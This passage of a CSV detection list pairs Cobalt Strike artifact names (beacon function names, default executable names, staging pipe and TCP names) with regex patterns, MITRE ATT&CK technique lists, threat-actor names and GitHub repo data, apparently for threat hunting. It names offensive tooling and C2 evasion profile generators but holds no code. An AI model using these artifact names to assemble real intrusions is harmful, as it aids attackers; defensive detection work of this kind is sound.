T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 
- T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exec_method_register*",".{0,1000}beacon_remote_exec_method_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*beacon_remote_exec_methods*",".{0,1000}beacon_remote_exec_methods.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exploit*",".{0,1000}beacon_remote_exploit.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - 
T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_remote_exploit_arch*",".{0,1000}beacon_remote_exploit_arch.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" 
"*beacon_remote_exploit_describe*",".{0,1000}beacon_remote_exploit_describe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exploit_register*",".{0,1000}beacon_remote_exploit_register.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - 
T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_remote_exploits*",".{0,1000}beacon_remote_exploits.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_smb.exe*",".{0,1000}beacon_smb\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default artifact name generated by cobaltstrike. Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Beacon_Stage_p2_Stuct*",".{0,1000}Beacon_Stage_p2_Stuct.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - 
T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*beacon_stage_pipe*",".{0,1000}beacon_stage_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_stage_pipe*",".{0,1000}beacon_stage_pipe.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*Beacon_Stage_Struct_p1*",".{0,1000}Beacon_Stage_Struct_p1.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 
- T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*Beacon_Stage_Struct_p3*",".{0,1000}Beacon_Stage_Struct_p3.{0,1000}","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","971","149","2024-04-02T20:12:17Z","2021-08-06T20:55:26Z" "*beacon_stage_tcp*",".{0,1000}beacon_stage_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*beacon_stage_tcp*",".{0,1000}beacon_stage_tcp.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - 
T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_test.exe*",".{0,1000}beacon_test\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","default artifact name generated by cobaltstrike. Cobalt Strike is threat emulation software. Execute targeted attacks against modern enterprises with one of the most powerful network attack kits available to penetration testers","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 
APT29","C2","https://www.cobaltstrike.com/","1","1","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_top *",".{0,1000}beacon_top\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://www.cobaltstrike.com/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*beacon_top_callback*",".{0,1000}beacon_top_callback.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Python API","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - 
T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/dcsync/pycobalt","1","1","N/A","10","10","293","57","2022-01-27T07:31:36Z","2018-10-28T00:35:38Z" "*BeaconApi.cs*",".{0,1000}BeaconApi\.cs.{0,1000}","offensive_tool_keyword","cobaltstrike","A .NET Runtime for Cobalt Strike's Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/CCob/BOF.NET","1","1","N/A","10","10","606","90","2024-01-02T16:39:15Z","2020-11-02T20:02:55Z" "*beacon-c2-go*",".{0,1000}beacon\-c2\-go.{0,1000}","offensive_tool_keyword","cobaltstrike","backdoor c2","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - 